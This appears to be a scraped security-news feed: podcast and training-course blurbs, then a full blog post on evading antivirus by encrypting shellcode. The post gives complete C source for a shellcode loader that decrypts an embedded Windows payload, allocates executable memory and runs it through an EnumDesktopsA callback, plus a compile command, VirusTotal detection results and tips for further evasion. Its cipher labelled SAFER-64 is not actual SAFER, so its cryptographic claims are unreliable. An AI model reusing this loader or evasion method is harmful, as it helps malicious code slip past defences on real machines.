Fortifying the Chain: A Proven Strategy for Supply Chain Defense
The post Fortifying the Chain: A Proven Strategy for Supply Chain Defense appeared first on Horizon3.ai.
Accelerate your DevOps journey with OffSec. Build secure, scalable, and efficient software delivery pipelines through real-world training.
The post Infrastructure Automation and Defense: Introducing DevSecOps Essentials appeared first on OffSec.
Today on Cyber Work, we are talking operational technology, or OT, security with guest, Robin Berthier of Network Perception. From his earliest studies to his time as an academic researcher, Berthier has dedicated his career to securing the intersection between operational technology and network security, with some pretty imaginative solutions to show for it. In today’s episode, Berthier explains why modern OT security means thinking more about the mechanics of the machinery than the swiftness of the software solutions, the big conversation that infrastructure and ICS Security need to have about nation-state attackers (and finally are having!) and Berthier's best piece of career advice turns into some excellent thoughts on the importance of maintaining your network… and I don’t mean routing and switching!
0:00 - Industrial control systems cybersecurity
1:54 - How Robin Berthier got into tech
3:38 - Majoring in cybersecurity
4:55 - Intrusion detection systems
9:18 - Mechanical and cybersecurity tools
12:33 Launching Network Perception
17:03 - Current state of ICS and OT infrastructure
20:24 - Cyberattacks on industrial control systems
28:35 -Skills needed to work in industrial control systems
35:19 - Where are ICS security jobs?
36:39 - Getting into local OT systems
37:55 - Skills gaps in ICS
39:21 - Best piece of career advice
41:01 - Cultivating a work network
43:28 - What is Network Perception?
45:27 - Learn more about Robin Berthier
45:58 - Outro
– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
Learn about the role of cybersecurity training in compliance. Discover how OffSec’s training can contribute to a strong compliance posture.
The post The Role of Cybersecurity Training in Compliance appeared first on OffSec.
Horizon3.ai Principal Security SME Stephen Gates and JTI Cybersecurity Principal Consultant Jon Isaacson discuss:
– What JTI does to validate things like access control, data loss prevention, ransomware protection, and intrusion detection approaches.
– How #pentesting and red team exercises allow orgs to validate the effectiveness of their security controls.
– Why offensive operations work best to discover and mitigate exploitable vulnerabilities in their client’s infrastructures.
The post Fireside Chat: Horizon3.ai and JTI Cybersecurity appeared first on Horizon3.ai.
Learn about the importance of cybersecurity compliance, most common cybersecurity compliance frameworks and how to navigate their complexities.
The post Cybersecurity Compliance: Understanding Regulatory Frameworks appeared first on OffSec.
Outsmart evolving cyber threats with Threat Hunting Essentials. This hands-on training path builds expertise in threat actor analysis, advanced hunting techniques, and data analysis.
The post Proactive Threat Detection: Introducing Threat Hunting Essentials appeared first on OffSec.
Stay ahead of hackers! OffSec Cyber Ranges train your team on the latest exploits for a proactive, adaptable defense.
The post The Race Against the Hackers: How the OffSec Cyber Ranges Keep You Ahead appeared first on OffSec.
Today on Cyber Work, our deep-dive into manufacturing and operational technology (OT) cybersecurity brings us to the problem of endpoint security. Tom Molden, CIO of Global Executive Engagement at Tanium, has been grappling with these problems for a while. We talk about his early, formative tech experiences (pre-Windows operation system!), his transformational position moving from fiscal strategy and implementation into his first time as chief information officer and talk through the interlocking problems that come from connected manufacturing devices and the specific benefits and challenges to be found in strategizing around the endpoints. All of the endpoints.
0:00 - Manufacturing and endpoint security
1:44 - Tom Molden's early interest in computers
4:06 - Early data usage
6:26 - Becoming a CIO
10:29 - Difference between a CIO and CISO
14:57 - Problems for manufacturing companies
18:45 - Best CIO problems to solve in manufacturing
22:51 - Security challenges of manufacturing
26:00 - The scop of endpoint issues
33:27 - Endpoints in manufacturing security
37:12 - How to work in manufacturing security
39:29 - Manufacturing security skills gaps
41:54 - Gain manufacturing security work experience
43:41 - Tom Molden's best career advice received
46:26 - What is Tanium
47:58 - Learn more about Tom Molden
48:34 - Outro
– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
Learn about the importance of clear and effective communication skills in cybersecurity.
The post Communication Skills in Cybersecurity appeared first on OffSec.
Infosec and Cyber Work Hacks are here to help you pass the CCNA exam! For today’s Hack, Wilfredo Lanz, Infosec bootcamp instructor in charge of Cisco’s CCNA certification, walks us through four sample CCNA questions, walking through each answer and discounting the wrong ones with explanations, allowing you to reach the right answer in a logical and stress-free way. And the only way you’re going to see it is by staying right here for this Cyber Work Hack!
0:00 - CCNA exam sample questions
1:31 - Different types of CCNA exam questions
3:34 - First CCNA exam sample question
8:34 - Second CCNA exam sample question
13:52 - Third CCNA exam sample question
20:47 - Fourth CCNA exam sample question
25:22 - Infosec CCNA boot camp practice exam
27:04 - Advice for CCNA exam day
28:46 - Outro
Learn more about the CCNA: https://www.infosecinstitute.com/training/ccna/
About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.
﷽
Hello, cybersecurity enthusiasts and white hackers!
This post is the result of my own research on try to evasion AV engines via encrypting payload with another algorithm: SAFER. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.
SAFER (Secure And Fast Encryption Routine) is a symmetric block cipher designed by James Massey. SAFER K-64 specifically refers to the variant with a 64-bit
key size. It’s notable for its nonproprietary nature and has been incorporated into some products by Cylink Corp.
SAFER K-64 operates as an iterated block cipher, meaning the same function is applied for a certain number of rounds. Each round utilizes two 64-bit
subkeys, and the algorithm exclusively employs operations on bytes. Unlike DES, SAFER K-64 is not a Feistel network.
For practical example, here is the step-by-step flow of the SAFER-64:
// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];
// SAFER-64 encryption rounds
for (i = 0; i < ROUNDS; i++) {
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
L ^= (T + R);
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
R ^= (T + L);
}
// update the data block with the encrypted values
data_ptr[0] = L;
data_ptr[1] = R;
So, the encryption function looks like this:
void safer_encrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = 0; i < ROUNDS; i++) {
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
What about decryption logic? The decryption process is not much different from encryption:
// extract left and right halves of the data block
L = data_ptr[0];
R = data_ptr[1];
// SAFER-64 decryption rounds
for (i = ROUNDS - 1; i >= 0; i--) {
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
R ^= (T + L);
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31); // Rotate left by 1 bit
L ^= (T + R);
}
// Update the data block with the decrypted values
data_ptr[0] = L;
data_ptr[1] = R;
Respectively, SAFER-64 Decryption Function looks like this:
void safer_decrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = ROUNDS - 1; i >= 0; i--) {
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
Full source code for my main logic (“malicious” payload encryption) look like this (hack.c
):
/*
* hack.c - encrypt and decrypt shellcode via SAFER. C++ implementation
* @cocomelonc
* https://cocomelonc.github.io/malware/2024/04/09/malware-cryptography-26.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#define BLOCK_SIZE 8 // 64 bits
#define ROUNDS 6
void safer_encrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = 0; i < ROUNDS; i++) {
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
void safer_decrypt(unsigned char *data, unsigned char *key) {
unsigned int *data_ptr = (unsigned int *)data;
unsigned int *key_ptr = (unsigned int *)key;
unsigned int L, R, T;
int i;
L = data_ptr[0];
R = data_ptr[1];
for (i = ROUNDS - 1; i >= 0; i--) {
T = L ^ key_ptr[(i % 4) + 4];
T = (T << 1) | (T >> 31);
R ^= (T + L);
T = R ^ key_ptr[i % 4];
T = (T << 1) | (T >> 31);
L ^= (T + R);
}
data_ptr[0] = L;
data_ptr[1] = R;
}
int main() {
unsigned char key[] = "\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77\x6d\x65\x6f\x77";
unsigned char my_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int len = sizeof(my_payload);
int pad_len = (len + BLOCK_SIZE - 1) & ~(BLOCK_SIZE - 1);
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len);
memcpy(padded, my_payload, len);
// encrypt the padded shellcode
for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
safer_encrypt(&padded[i], key);
}
printf("encrypted:\n");
for (int i = 0; i < sizeof(padded); i++) {
printf("\\x%02x", padded[i]);
}
printf("\n\n");
// decrypt the padded shellcode
for (int i = 0; i < pad_len; i += BLOCK_SIZE) {
safer_decrypt(&padded[i], key);
}
printf("decrypted:\n");
for (int i = 0; i < sizeof(padded); i++) {
printf("\\x%02x", padded[i]);
}
printf("\n\n");
LPVOID mem = VirtualAlloc(NULL, sizeof(padded), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, pad_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, (LPARAM)NULL);
return 0;
}
As you can see, first of all, before encrypting, we use padding via the NOP (\x90
) instructions.
As usually, I used meow-meow
payload:
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
For simplicity, I use running shellcode via EnumDesktopsA logic.
Let’s go to see this trick in action. Compile our “malware”:
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive
And run it at the victim’s machine (Windows 10 x64 v1903
in my case):
As you can see, our decrypted shellcode is modified: padding \x90
is working as expected.
Calc entropy and upload to VirusTotal:
python3 entropy.py -f ./hack.exe
24 of of 70 AV engines detect our file as malicious as expected.
As you can see, this algorithm encrypts the payload quite well, but it is detected by many AV engines and is poorly suited for bypassing them, but this is most likely due to the fact that a well-studied method of launching the payload is used. if you apply anti-debugging, anti-disassembly and anti-VM tricks, the result will be better.
The Singapore government has considered using SAFER with a 128-bit
key for various applications due to its lack of patent, copyright, or other restrictions, making it an attractive choice for widespread adoption.
I hope this post spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.
SAFER
Malware and cryptography 1
source code in github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine